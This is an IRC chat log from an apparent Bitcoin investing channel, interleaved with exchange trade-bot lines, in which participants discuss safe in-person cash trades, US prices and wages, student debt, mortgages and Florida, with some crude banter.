coinbase if/when we do another stock offering Aug 15 22:42:30 Might not need it i guess though, all depends on how the portfolio loan goes Aug 15 22:42:30 would you look at that, he basically re-used it. Aug 15 22:43:19 kingofsports i suppose this makes you a thought leader in your industry :D Aug 15 22:43:50 lol Aug 15 22:43:53 i guess Aug 15 22:43:56 dunno Aug 15 22:44:19 any of you two ever tried satoshi square thing ? Aug 15 22:44:32 whats that? the new york meetup hot spot? Aug 15 22:44:49 i think they have a bunch of locations by now Aug 15 22:44:52 not just ny Aug 15 22:44:55 ah Aug 15 22:45:00 I hope there will be enough interest in Paris soon… for now we're not enough Aug 15 22:45:09 well i live in craptown maryland so be surprised if theres any huge interest here. Aug 15 22:45:17 [BTCTC] [BTC-GROWTH] 24 @ 0.1 = 2.4 BTC [+] Aug 15 22:45:18 [MPEX] [S.MPOE] 12407 @ 0.00086203 = 10.6952 BTC [+] Aug 15 22:45:19 [BTCTC] [DMS.PURCHASE] 10 @ 0.0208 = 0.208 BTC [+] Aug 15 22:45:35 has anyone got a gun held to their head selling locally? that u know of. The $1000 deal is a local one and im a lil worried bout safety. Aug 15 22:45:54 i mean itll be in starbucks but $1000 is a lot of money for meth addicts or people truly broke. Aug 15 22:45:58 never heard of it no Aug 15 22:46:13 okay, dumb anxiety. Aug 15 22:46:28 i expect it will happen sooner or later. Aug 15 22:46:28 kingofsports you should probably have a good security scenario worked out if dealing in those kinds of amounts in person Aug 15 22:46:34 I heard one story of a guy who got beat up Aug 15 22:46:41 meet the guy inside a bank Aug 15 22:46:42 [BTCTC] [LABCOIN] 1 @ 0.00167 BTC [+] Aug 15 22:46:44 but I don't think he did it in public Aug 15 22:46:54 and deposit the cash before you leave Aug 15 22:47:07 hm the bank would be right next to me. Aug 15 22:47:21 better yet, Aug 15 22:47:22 being inside the bank is probably safer Aug 15 22:47:34 make sure he doesn't know before where exactly the deal will happen Aug 15 22:47:39 lol kakobrekla got glined Aug 15 22:47:48 lol mircea_popescu fell for it Aug 15 22:47:49 agree to meet at starbucks, Aug 15 22:47:55 then walk with him to the bank Aug 15 22:47:59 something like that Aug 15 22:48:02 its my standard quit msg Aug 15 22:48:03 heres my situation tho, i dont want to get banks involved. if im moving a ton of money around, then that could trigger the 10k a month flag. I have nothing to hide but i dont want the IRS bothering me. No one does even those with nothing to hide. Aug 15 22:48:08 kakobrekla scam. Aug 15 22:48:13 i kno rite Aug 15 22:48:19 i have a safety deposit box in bank i just keep cash in. Aug 15 22:48:21 freenode adds 'Quit: ', doesn't work well Aug 15 22:48:37 its from the what.cd days Aug 15 22:48:41 kingofsports so hire a coupla thugs Aug 15 22:48:48 lol Aug 15 22:48:57 the romanian way Aug 15 22:48:59 half hour, free coffee Aug 15 22:49:26 free sunglasses Aug 15 22:49:29 mircea_popescu are you MPOE-PR? or do u have a public relations guy who owns that account? Aug 15 22:49:33 it's a girl. Aug 15 22:49:47 congratulations Aug 15 22:49:53 boobs Aug 15 22:50:05 lmao ThickAsThieves Aug 15 22:50:33 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 15 22:50:39 :) Aug 15 22:50:48 oh facepalm btcrobot :( Aug 15 22:51:08 scam site trying to sell something, not really sure what Aug 15 22:51:17 mircea_popescu: wat Aug 15 22:51:22 Hollywood spamvertised to all fuck too. Aug 15 22:51:40 Scrat go register #psychotherapy Aug 15 22:51:40 yeah, I saw it on google search Aug 15 22:51:57 hey scrat how much do you keep in the coinroll.it hot wallet? Aug 15 22:51:59 generally Aug 15 22:52:34 someone was asking about it in just-dice convo box. Aug 15 22:53:19 #bitcoin-OTC Aug 15 22:53:22 kingofsports: well it depends, 15-20 minimum Aug 15 22:53:31 ah okay Aug 15 22:53:49 [BTCTC] [TAT.ASICMINER] 30 @ 0.0401 = 1.203 BTC [+] Aug 15 22:54:14 [TE KOOP] Casascius Physical 1 BTC 1oz .999 Silver rounds Aug 15 22:54:56 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 15 22:55:17 mircea_popescu: not familiar with the sport Aug 15 22:55:33 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [-] Aug 15 22:56:01 https://bitcointalk.org/index.php?topic=274373.0 Aug 15 22:56:04 Mt.Gox/Bitstamp spread breaches previous record. 13.69% on August 15th. Aug 15 22:56:16 but I guess i can become a PsychoTheRapist Aug 15 22:56:24 [BTCTC] [ASICMINER-PT] 4 @ 3.924 = 15.696 BTC [+] Aug 15 22:56:29 so this bit777 owner dude, claims there is 0% house edge blackjack. pfff no way. Aug 15 22:57:06 his games are not provably fair just the general audited RNG bullshit, i dont play but its funny cause i so want to prove over a sample of 100,000 rolls that his game is -EV Aug 15 22:57:09 and not truly fair Aug 15 22:57:27 I'll probably leave BitVPS within a few months, probably early 2014. Start applying for my position. Fun activities like spreadsheeting, handling refunds and updating the website and products. Aug 15 22:59:09 http://www.youtube.com/watch?v=NyemAwLD2N0 Aug 15 22:59:10 Gold Gone? Germany baffled as Fed bars access to bullion - YouTube Aug 15 23:00:18 Lol... Aug 15 23:00:44 "US financial institutions have a history of selling things that don't exist" Aug 15 23:01:07 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 15 23:01:32 [BTCTC] [TAT.ASICMINER] 32 @ 0.04028 = 1.289 BTC [+] Aug 15 23:02:05 lol psychotherapist Aug 15 23:02:25 "the US has basically been able to tax the whole world" Aug 15 23:02:39 ThickAsThieves they've been trying to get to their gold for half a year Aug 15 23:02:51 maybe in 2020 Aug 15 23:03:04 not unless they invade. Aug 15 23:03:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.04 = 0.16 BTC [-] Aug 15 23:03:38 [BTCTC] [TAT.ASICMINER] 30 @ 0.03945 = 1.1835 BTC [-] Aug 15 23:03:39 [BTCTC] [TAT.ASICMINER] 9 @ 0.03942 = 0.3548 BTC [-] Aug 15 23:04:09 so the dr guy - he is analyst and a therapist? Aug 15 23:04:22 the rapist Aug 15 23:05:05 http://www.funnyordie.com/videos/25633d24e1/snl-celebrity-jeopardy-5-9-98 Aug 15 23:05:14 SNL Celebrity Jeopardy 5-9-98 from David Webber Aug 15 23:05:48 so what is the US going to do, buy the gold they sold, or pour fake bars? Aug 15 23:06:05 pankkake they're going to issue supoenas. Aug 15 23:06:10 create bills Aug 15 23:06:15 WWIII - The day the world wanted its due back Aug 15 23:06:19 and generally act as if they exist / anyoen would take them seriously Aug 15 23:06:19 In theaters September 2 Aug 15 23:06:33 we'll drive down the price of gold to buy it back Aug 15 23:06:36 well that's what they are doing now Aug 15 23:06:40 hehe Aug 15 23:06:45 http://tech.co/7-famous-individuals-banking-on-the-success-of-bitcoin-2013-08 Aug 15 23:06:47 ThickAsThieves pirate tried that Aug 15 23:06:47 7 Famous Individuals Banking on the Success of Bitcoin Aug 15 23:06:49 lolz ^ Aug 15 23:06:53 i guess they wanted him as a consultant Aug 15 23:06:57 hehe Aug 15 23:07:07 it's probably going to work just as well. Aug 15 23:07:13 US will end up with $150k too? Aug 15 23:11:16 so my prostitextuation translation project was quite successful in the end. now i'm getting offers to have stuff translated in serbian and whatnot Aug 15 23:11:17 https://bitcointalk.org/index.php?topic=220933.0 Aug 15 23:11:21 Looking for lenders Aug 15 23:11:21 lulz Aug 15 23:12:59 the forums deliver. Aug 15 23:13:03 [BTCTC] [TAT.ASICMINER] 9 @ 0.04028 = 0.3625 BTC [+] Aug 15 23:14:39 ;;nethash Aug 15 23:14:41 415387.843767 Aug 15 23:14:51 ;;estimate Aug 15 23:14:53 Next difficulty estimate | None based on data since last change | 58028125.9656 based on data for last three days Aug 15 23:14:54 ;;bcstats Aug 15 23:14:55 [BTCTC] [DMS.MINING] 17 @ 0.0029 = 0.0493 BTC [-] Aug 15 23:14:55 [BTCTC] [DMS.MINING] 6 @ 0.0029 = 0.0174 BTC [-] Aug 15 23:14:56 [BTCTC] [DMS.MINING] 32 @ 0.0029 = 0.0928 BTC [-] Aug 15 23:14:57 Current Blocks: 252340 | Current Difficulty: 5.081033904827648E7 | Next Difficulty At Block: 254015 | Next Difficulty In: 1675 blocks | Next Difficulty In About: 1 week, 2 days, 16 hours, 22 minutes, and 11 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 15 23:15:35 mircea , now all we need to do is get Nefario, Usag, Patrick Harnett to join that thread Aug 15 23:15:37 [BTCTC] [LABCOIN] 20 @ 0.001642 = 0.0328 BTC [-] Aug 15 23:15:38 [BTCTC] [LABCOIN] 36 @ 0.00164 = 0.059 BTC [-] Aug 15 23:15:40 [BTCTC] [LABCOIN] 322 @ 0.001618 = 0.521 BTC [-] Aug 15 23:15:41 [BTCTC] [LABCOIN] 222 @ 0.001617 = 0.359 BTC [-] Aug 15 23:15:57 What? MAY 2013!? Aug 15 23:16:05 Lol, I never saw that Aug 15 23:16:34 Hollywood i'd settle for pietila. Aug 15 23:16:58 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 15 23:19:03 https://bitcointalk.org/index.php?topic=214750.0 Aug 15 23:19:06 [WTB] Mortgage Cosigner or Mortgage loan Aug 15 23:19:09 big facepalm Aug 15 23:19:45 yeah wtg car loan Aug 15 23:19:49 wtb* Aug 15 23:19:56 [HAVELOCK] [SDSTM] 10 @ 0.0062611 = 0.0626 BTC [+] Aug 15 23:20:34 [BTCTC] [ACTIVEMINING] 68 @ 0.005199 = 0.3535 BTC [+] Aug 15 23:20:35 [BTCTC] [ACTIVEMINING] 6 @ 0.005201 = 0.0312 BTC [+] Aug 15 23:20:36 [BTCTC] [ACTIVEMINING] 20 @ 0.005212 = 0.1042 BTC [+] Aug 15 23:20:36 [BTCTC] [ACTIVEMINING] 76 @ 0.005213 = 0.3962 BTC [+] Aug 15 23:20:52 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 15 23:21:31 http://www.bbc.co.uk/news/business-23710921 Aug 15 23:21:35 BBC News - US consumer inflation rises to 2% Aug 15 23:21:45 [MPEX] [S.MPOE] 2543 @ 0.00086203 = 2.1921 BTC [+] Aug 15 23:22:24 lol 2% srsly. Aug 15 23:22:28 2% a month or what. Aug 15 23:23:01 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 15 23:23:11 2% a day Aug 15 23:23:27 Shit is really expensive Aug 15 23:23:32 Got to print lots of bills to buy back all that gold that was sold. Aug 15 23:23:35 foor is outrageous Aug 15 23:23:45 food Aug 15 23:23:52 fuck, really everything Aug 15 23:24:01 Hollywood ikr? Aug 15 23:24:15 even cheap replacement industrial stuff is expensive. Aug 15 23:24:20 [BTCTC] [DMS.PURCHASE] 1 @ 0.0208 BTC [+] Aug 15 23:24:22 actual food is nigh on impossible to find Aug 15 23:24:29 [BTCTC] [ACTIVEMINING] 30 @ 0.0052 = 0.156 BTC [-] Aug 15 23:24:31 [BTCTC] [ACTIVEMINING] 68 @ 0.005201 = 0.3537 BTC [+] Aug 15 23:24:32 [BTCTC] [ACTIVEMINING] 19 @ 0.005201 = 0.0988 BTC [+] Aug 15 23:24:33 [BTCTC] [ACTIVEMINING] 4 @ 0.005212 = 0.0208 BTC [+] Aug 15 23:24:34 [BTCTC] [ACTIVEMINING] 24 @ 0.005213 = 0.1251 BTC [+] Aug 15 23:24:35 [BTCTC] [ACTIVEMINING] 3 @ 0.005299 = 0.0159 BTC [+] Aug 15 23:24:36 [BTCTC] [ACTIVEMINING] 17 @ 0.0053 = 0.0901 BTC [+] Aug 15 23:24:36 [BTCTC] [ACTIVEMINING] 20 @ 0.005399 = 0.108 BTC [+] Aug 15 23:24:38 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Aug 15 23:24:39 [BTCTC] [ACTIVEMINING] 90 @ 0.005419 = 0.4877 BTC [+] Aug 15 23:24:40 [BTCTC] [ACTIVEMINING] 350 @ 0.00542 = 1.897 BTC [+] Aug 15 23:24:41 [BTCTC] [ACTIVEMINING] 100 @ 0.005422 = 0.5422 BTC [+] Aug 15 23:24:42 [BTCTC] [ACTIVEMINING] 148 @ 0.005424 = 0.8028 BTC [+] Aug 15 23:24:43 [BTCTC] [ACTIVEMINING] 743 @ 0.005425 = 4.0308 BTC [+] Aug 15 23:24:44 [BTCTC] [ACTIVEMINING] 20 @ 0.005449 = 0.109 BTC [+] Aug 15 23:24:45 [BTCTC] [ACTIVEMINING] 100 @ 0.00545 = 0.545 BTC [+] Aug 15 23:24:46 [BTCTC] [ACTIVEMINING] 155 @ 0.005475 = 0.8486 BTC [+] Aug 15 23:24:47 [BTCTC] [ACTIVEMINING] 776 @ 0.005476 = 4.2494 BTC [+] Aug 15 23:24:47 [BTCTC] [ACTIVEMINING] 313 @ 0.005497 = 1.7206 BTC [+] Aug 15 23:24:48 [BTCTC] [ACTIVEMINING] 269 @ 0.005498 = 1.479 BTC [+] Aug 15 23:24:49 [BTCTC] [ACTIVEMINING] 1151 @ 0.0055 = 6.3305 BTC [+] Aug 15 23:25:07 I don't find stuff too expensive yet. Affordable, even Aug 15 23:25:18 canada is behind the curve. Aug 15 23:25:38 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 15 23:25:50 shit is really expensive, as an employer I do not see how people that work for me make it Aug 15 23:25:51 Anyone in the US can give me a few prices examples? Aug 15 23:26:22 you know the sandwich shop Subway right? Aug 15 23:26:25 ;;seen bs Aug 15 23:26:26 I have not seen bs. Aug 15 23:26:30 ;;seen vbs Aug 15 23:26:30 vbs was last seen in #bitcoin-assets 1 week, 6 days, 16 hours, 52 minutes, and 42 seconds ago: ok Aug 15 23:26:30 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001152 = 0.0023 BTC [+] Aug 15 23:26:32 yeah Aug 15 23:26:41 so did vbs change his name? Aug 15 23:26:47 to kleeck or sumth Aug 15 23:26:51 6 inch plain sub, chips and a drink $11 Aug 15 23:27:01 ouch... Aug 15 23:27:16 pizza delivered about $25 Aug 15 23:27:28 maybe on a good day $18 Aug 15 23:27:45 gas is $3.55/g here atm Aug 15 23:27:55 gallon Aug 15 23:27:57 grey goose and sprite about $9 Aug 15 23:28:33 25 for ONE pizza? Aug 15 23:28:47 from where? Aug 15 23:28:57 space Aug 15 23:29:01 surely papa jons and such is cheaper Aug 15 23:29:02 [BTCTC] [LABCOIN] 5 @ 0.001641 = 0.0082 BTC [+] Aug 15 23:29:04 thats about what it is here Aug 15 23:29:06 but its a loaded large Aug 15 23:29:07 that might get you 2 medium deliivered- most anywhere around here Aug 15 23:29:19 and the larges around here are huge Aug 15 23:29:19 the thing is, pizza used to be 5-7 bux Aug 15 23:29:23 [BTCTC] [LABCOIN] 85 @ 0.001642 = 0.1396 BTC [+] Aug 15 23:29:39 a normal low end house around here $200 $250 Aug 15 23:29:47 that gets you nothing special Aug 15 23:30:08 property price varies wildly Aug 15 23:30:18 I get 3 large for 32+ taxes at dominos Aug 15 23:30:40 well, ok neighborhood that I would let my kids play in $300 or up Aug 15 23:30:45 What about stuff like eggs or bread? Aug 15 23:31:02 or whatever other generic staples Aug 15 23:31:15 in 2005 stuff like that was half Aug 15 23:32:15 [BTCTC] [LABCOIN] 85 @ 0.001644 = 0.1397 BTC [+] Aug 15 23:32:20 I don't go to the store so idk really. when I go I just pick shit up and buy it Aug 15 23:32:25 my wife goes Aug 15 23:32:29 probably in 2005 the dollar was also half as stronger Aug 15 23:32:46 [BTCTC] [LABCOIN] 5 @ 0.001643 = 0.0082 BTC [-] Aug 15 23:32:55 yes, that is probably correct Aug 15 23:32:59 What's your employees wage? Minimum? Where does that sits at? Aug 15 23:33:16 federal is $9 I think Aug 15 23:33:25 lowest you can hire for here is $11 Aug 15 23:33:37 no one will take a job under that Aug 15 23:33:44 $7.25 is min wage in US Aug 15 23:33:54 depends on the state really Aug 15 23:33:56 not enough to live Aug 15 23:34:07 States often have much higher set amoutns Aug 15 23:34:18 7.79 in FL Aug 15 23:34:20 theres just a federal floor Aug 15 23:34:29 * ma Aug 15 23:34:32 8* Aug 15 23:34:37 We all think of what our state and local stuff is Aug 15 23:34:43 oh... prices don't look that different from Canada. $11 minimum wage Aug 15 23:35:00 DC is a long way away Aug 15 23:35:22 it's funny when you look at what jobs pay similarly now Aug 15 23:35:31 Full time on minimum wage, single and with roommates, you have way more cash than you need. Aug 15 23:35:46 If you have kids/smoke/whatever, you're kind of screwed tho Aug 15 23:36:24 blue collar jobs are like jr graphic designer Aug 15 23:36:37 I think < a basic 1 bed apt around here is on the very low end $800? Aug 15 23:36:54 $11 is a guy that washes cars and cleans the floor Aug 15 23:36:58 here Aug 15 23:37:02 ouch... that's high Aug 15 23:37:04 you can make more being a good waitress than many college-skilled jobs Aug 15 23:37:21 college just makes your debt worse Aug 15 23:37:41 unless you are going to be a "professional" of some sort like doc/law/finance Aug 15 23:37:57 college prices are insane now too Aug 15 23:38:19 college prices are insane now too < I have heard and I almost fell over Aug 15 23:38:38 https://en.wikipedia.org/wiki/File:College_tuition_cpi.jpg Aug 15 23:38:49 tune in, drop out Aug 15 23:39:05 dat bubble Aug 15 23:39:25 totally bubble. Aug 15 23:39:35 ammo bubble Aug 15 23:39:46 why be unemployed when you can just incur debt at college! Aug 15 23:39:55 I do not get the ammo bubble Aug 15 23:40:04 but it is real Aug 15 23:40:12 once it bubbles there's nothing to get Aug 15 23:40:16 full on panick buying Aug 15 23:40:26 like parents who panick that little jimmy is stupid Aug 15 23:40:30 so they send him to college Aug 15 23:40:48 i think thats changing Aug 15 23:40:51 when i was a teen Aug 15 23:40:55 jeez i hope so Aug 15 23:41:00 kinda has to ROI isnt there Aug 15 23:41:02 the mentality was totally that everyone should go to college Aug 15 23:41:05 no matter what Aug 15 23:41:08 Here prices for housing ranges from 400-450 for low end 1 1/2 to 1500 for 8 1/2 Aug 15 23:41:17 why be unemployed when you can just incur debt at college! <<< this. Aug 15 23:41:23 stupid people shouldn't go to college and get in debt Aug 15 23:41:45 You get a big appartement with 3-4 bedrooms at 1200-1500 with roommates and it's cheap and OK Aug 15 23:41:47 they should stay at a stupid job and try to aquire assets minus college Aug 15 23:41:52 Just not as much privacy Aug 15 23:42:02 jcpham you need a jcpham-pr girl to tell tjhem that. Aug 15 23:42:06 But the rest is priced similar Aug 15 23:42:19 houses are that expensive in canada? Aug 15 23:42:21 a lot of americans haven't figured out that the point is to acquire assets Aug 15 23:42:24 its so cold Aug 15 23:42:28 because the money is worth less tomorrow Aug 15 23:42:35 Houses are expensive in Canada Aug 15 23:42:44 that's a huge relaization that like 50% of the population hasn't realized yet Aug 15 23:42:44 Housing prices never really crashed like the US Aug 15 23:42:54 well there is a student loan bubble too Aug 15 23:43:02 I saw some stats, that one is going to be fun Aug 15 23:43:05 you can get 2000 sqft here for like $175k Aug 15 23:43:06 most of it is federally backed Aug 15 23:43:08 hard to default Aug 15 23:43:18 (north FL) Aug 15 23:43:20 impossible to default Aug 15 23:43:26 Not impossible jsut hard Aug 15 23:43:53 virtually impossible, stafford/pel are with you through bankruptcy and most disability Aug 15 23:43:58 [BTCTC] [DMS.MINING] 11 @ 0.00294 = 0.0323 BTC [+] Aug 15 23:44:16 Here 200k gets you something tiny Aug 15 23:44:27 thos eloans will negotiate with you though Aug 15 23:44:32 if you have a chance of recovery in any time frame then you won't be able to get your loans discharged Aug 15 23:44:34 [MPEX] [S.MPOE] 16500 @ 0.0008653 = 14.2775 BTC [+] Aug 15 23:44:38 all kinds of extensions and stuff offered Aug 15 23:44:56 ya tons of deferments just no forgiveness Aug 15 23:45:16 Duffer1 who the fuck came up with the nonbankruptcy bankruptcy Aug 15 23:45:22 ffs. ALL debt washes. ALL of it. Aug 15 23:45:28 no exceptions. taxes included. everything included. Aug 15 23:45:38 not american student loans :( Aug 15 23:46:00 college debt is the ultimate crusher of dreams Aug 15 23:46:36 bankruptcy would be part of finishing college otherwise Aug 15 23:47:02 you're not wrong TaT Aug 15 23:47:06 seems like exiting college bankrupt Aug 15 23:47:13 is not a bad idea Aug 15 23:47:16 just wish there was a better solution to the problem Aug 15 23:47:21 ThickAsThieves yeah, and it'd ruin the entire bubble machine. Aug 15 23:47:35 break the bubble! Aug 15 23:47:52 but seriously i owe a third mortgage on my wife's loans Aug 15 23:47:55 [BTCTC] [DMS.MINING] 9 @ 0.00294 = 0.0265 BTC [+] Aug 15 23:47:56 [BTCTC] [DMS.MINING] 30 @ 0.00296 = 0.0888 BTC [+] Aug 15 23:47:56 fml Aug 15 23:47:57 [BTCTC] [DMS.MINING] 63 @ 0.002969 = 0.187 BTC [+] Aug 15 23:47:58 [BTCTC] [DMS.MINING] 30 @ 0.00297 = 0.0891 BTC [+] Aug 15 23:47:59 [BTCTC] [DMS.MINING] 66 @ 0.00298 = 0.1967 BTC [+] Aug 15 23:48:00 [BTCTC] [DMS.MINING] 99 @ 0.00299 = 0.296 BTC [+] Aug 15 23:48:00 [BTCTC] [DMS.MINING] 150 @ 0.00302 = 0.453 BTC [+] Aug 15 23:48:01 [BTCTC] [DMS.MINING] 50 @ 0.00304 = 0.152 BTC [+] Aug 15 23:48:08 ouch Aug 15 23:48:16 i'm only like a half mil in debt Aug 15 23:48:17 you shul;d have bought a cheaper russian girl. Aug 15 23:48:25 no big deal Aug 15 23:48:28 rofl Aug 15 23:48:36 College dropout. Landed a job. Then Bitcoin. Instant success. Never looked back. Aug 15 23:48:55 [16:48] i'm only like a half mil in debt <<< IPO something Aug 15 23:49:00 20 more years i'll own some worthless property Aug 15 23:49:20 IPO your wife's career Aug 15 23:49:25 [BTCTC] [DMS.PURCHASE] 250 @ 0.0208 = 5.2 BTC [+] Aug 15 23:49:29 [HAVELOCK] [AM100] 17 @ 0.038899 = 0.6613 BTC [+] Aug 15 23:49:31 legit bitcoin pharmacy Aug 15 23:49:35 no thanks Aug 15 23:49:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 15 23:49:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Aug 15 23:49:52 my wife is a drug dealer Aug 15 23:49:59 she has no other purpose Aug 15 23:50:02 lol ipo something Aug 15 23:50:11 rite? Aug 15 23:50:16 half mil should be easy peasy Aug 15 23:50:26 just say you are chinese and you make chips Aug 15 23:50:31 but have them be potato chips Aug 15 23:50:39 rice chips Aug 15 23:50:46 Write it all sloppy to so they believe you're chinese Aug 15 23:51:01 one of my mortgages i lose about a hundred bucks each month on Aug 15 23:51:11 for approx. 4 years now Aug 15 23:51:19 education was useful for me to 1) meet people 2) get internships (legally). dropped out 2/3 of the time :p Aug 15 23:51:43 [HAVELOCK] [XBOND] 683 @ 0.0010483 = 0.716 BTC [-] Aug 15 23:51:52 [HAVELOCK] [XBOND] 1 @ 0.0010482 BTC [-] Aug 15 23:51:53 i got my mortgage at some super low rate and then they jammed an equity line down my throat Aug 15 23:51:55 mortgage - rent = loss Aug 15 23:52:04 worked out well for me Aug 15 23:52:09 Education is good if you're learning a trade or getting the education for lawyer or doctor and etc Aug 15 23:52:10 it's one of these bullshit bubble loans Aug 15 23:52:16 that i can't refinance Aug 15 23:52:25 something about the bubment Aug 15 23:52:29 *gubment Aug 15 23:52:44 then when banks died they froze the equity line and tried offering new "deals" Aug 15 23:52:50 [BTCTC] [DMS.MINING] 100 @ 0.00306 = 0.306 BTC [+] Aug 15 23:53:06 all of which had higher interest Aug 15 23:53:11 all the new deals i've seen are terrible with adjustable interest rates Aug 15 23:53:16 or higher interest Aug 15 23:53:22 yeha pretty much Aug 15 23:53:32 Borrowing money... not even once Aug 15 23:53:54 you own a house? Aug 15 23:53:58 without borrowing? Aug 15 23:54:06 No Aug 15 23:54:12 I own 2 Aug 15 23:54:13 Just a generic tip Aug 15 23:54:17 ;;echo .d Aug 15 23:54:18 .d Aug 15 23:54:20 50810339.04828 | Next Diff in 1669 blocks | Estimated Change: 14.3309% in 9d 22h 7m 56s Aug 15 23:54:26 but they aren't mine for another 15-25 years Aug 15 23:54:39 depnds on which one we're talking about Aug 15 23:54:53 i assume you rent one out? Aug 15 23:55:01 At this rate I'll be able to afford one in cash within 5-10 years Aug 15 23:55:05 yeah but the rent doesn't cover the full mortgage Aug 15 23:55:15 But I don't think I'll be buying Aug 15 23:55:18 i rent one too, but it covers the bills Aug 15 23:55:19 because i have 20k comparables Aug 15 23:55:23 Unless house prices go down Aug 15 23:55:25 foreclosures Aug 15 23:55:28 No, I have an appartment Aug 15 23:55:32 you know the real estate story Aug 15 23:55:36 yeah Aug 15 23:55:40 [BTCTC] [BASIC-MINING] 40 @ 0.3157 = 12.628 BTC [+] Aug 15 23:55:47 Owned by the family Aug 15 23:55:50 Rent is cheap Aug 15 23:56:01 i did apartments for awhile Aug 15 23:56:05 me + the wife Aug 15 23:56:18 we wanted to move closer to Jacksonville last year and gave up because people just wanted bargains due to all the foreclosures Aug 15 23:56:19 sooner or later you get tired of throwing that money away and want equity Aug 15 23:56:28 appartments are better anyway. Aug 15 23:56:36 easier to give the girls privacy Aug 15 23:56:40 ha Aug 15 23:56:51 apartments dont let you make a lot of noise Aug 15 23:56:54 i like to make noise Aug 15 23:57:02 i like to make noise and set shit on fire Aug 15 23:57:08 so i need privacy Aug 15 23:57:27 also garages Aug 15 23:57:30 for cars Aug 15 23:57:30 Which ammo bubble? Aug 15 23:57:39 silver bullets Aug 15 23:57:41 [BTCTC] [DMS.SELLING] 3 @ 0.01804 = 0.0541 BTC [-] Aug 15 23:58:22 ThickAsThieves da fuck noise you make ? Aug 15 23:58:32 i'm not wealthy. left home at 18. had friends cosign for first 5k loan Aug 15 23:58:35 the rest is history Aug 15 23:58:40 i make music Aug 15 23:58:49 my apt is right next to rush street with tramway. no one ever complained about noise :P Aug 15 23:59:04 ThickAsThieves a ok Aug 15 23:59:10 after you pay of the 5k loan, someone gives you 10k Aug 15 23:59:12 elec guitars, fat beats, rappers Aug 15 23:59:14 etc Aug 15 23:59:15 then they give you 120k Aug 15 23:59:20 then they give you 390k Aug 15 23:59:21 but the settin things on fire... now that would be a problem Aug 15 23:59:21 so get a few studios in a musician building Aug 15 23:59:24 they ALL make music. Aug 15 23:59:29 i'm a hermit Aug 15 23:59:37 ya see tat's the problem with you people. Aug 15 23:59:48 i find most people to be totally boring Aug 15 23:59:55 i get very antsy Aug 16 00:00:02 i end up sleeping with some chick by knocking ion the wrong door. cause i'm marginally sociable. Aug 16 00:00:13 unlike everyone else, being fucking hermits. Aug 16 00:00:14 i can be sociable Aug 16 00:00:30 [BTCTC] [RSM] 8 @ 0.0119 = 0.0952 BTC [+] Aug 16 00:00:31 just cant do small talk for long Aug 16 00:00:31 [BTCTC] [RSM] 42 @ 0.01249 = 0.5246 BTC [+] Aug 16 00:00:36 3 houses, one lot, 215k Aug 16 00:00:40 have trouble remembering names Aug 16 00:00:40 err, 5 houses Aug 16 00:01:07 One house is 2400sf, another is 1100sf , then 3 singlewide MHs Aug 16 00:01:22 property magnate Aug 16 00:01:25 megahashes? Aug 16 00:01:30 MobileHomes Aug 16 00:01:32 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Aug 16 00:01:36 trailers! Aug 16 00:01:47 omg trailers meets btc Aug 16 00:02:04 ThickAsThieves: are you me? Aug 16 00:02:13 i live on a lake. lots of trailers in certain places Aug 16 00:02:16 [HAVELOCK] [XBOND] 16 @ 0.00105 = 0.0168 BTC [+] Aug 16 00:02:19 possibly Aug 16 00:02:20 [BTCTC] [RSM] 1 @ 0.01248 BTC [-] Aug 16 00:02:26 gotta love the trailer parks Aug 16 00:03:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.04022 = 0.1609 BTC [+] Aug 16 00:03:21 trailer park chicks around here are gross Aug 16 00:03:22 when i moved to FL, i went from living on Comm Ave in Boston to a trailer Aug 16 00:03:33 was quite the change Aug 16 00:03:47 FL is below me Aug 16 00:03:51 i never go there Aug 16 00:04:02 literally on a map Aug 16 00:04:07 beneath me Aug 16 00:04:14 ? Aug 16 00:04:19 Trailers in Ohio are generally more trashy, higher income Aug 16 00:04:28 geography pun. Aug 16 00:04:39 your chair is a map? Aug 16 00:05:00 why do so many people visit panama city Aug 16 00:05:05 that place sucks Aug 16 00:05:06 i dont Aug 16 00:05:07 hehe Aug 16 00:05:18 ask evoorhees Aug 16 00:05:18 most places in FL suck Aug 16 00:05:24 i stayed there for a week in high school Aug 16 00:05:30 and got a reckless driving ticket Aug 16 00:05:33 on a rented scooter Aug 16 00:05:39 fuck florida Aug 16 00:05:55 they call themselves The City of Panama City, Florida. Aug 16 00:05:58 hehe Aug 16 00:05:58 I took my picture under a1a beachfront ave Aug 16 00:06:09 so I could be like vanilla ice Aug 16 00:06:12 ice ice baby Aug 16 00:06:38 West Palms is better Aug 16 00:06:47 Tampa is okay Aug 16 00:06:54 St. Aug too Aug 16 00:06:59 I did not like F.t Lauderdale much Aug 16 00:07:05 Love St. Aug Aug 16 00:07:06 Ft Aug 16 00:07:21 the last place i went in fl. was key west Aug 16 00:07:31 so i drove through all of it and ignored it Aug 16 00:07:48 I'll stick to Montreal Aug 16 00:07:50 That was ok, too many convertible Sebrings there for my taste, if you know what I mean Aug 16 00:07:58 I'm fine here Aug 16 00:07:58 in Key West Aug 16 00:08:05 i got the joke Aug 16 00:08:16 i noticed a large homosexual population also Aug 16 00:08:18 heh jcpham is online via hobana.freenode.net (Bucharest, RO) Aug 16 00:08:43 what's wrong with hobana Aug 16 00:09:24 My favorite place is Whistler BC Aug 16 00:09:28 [BTCTC] [LABCOIN] 85 @ 0.001643 = 0.1397 BTC [-] Aug 16 00:09:28 [BTCTC] [LABCOIN] 20 @ 0.001642 = 0.0328 BTC [-] Aug 16 00:09:30 [BTCTC] [LABCOIN] 294 @ 0.001618 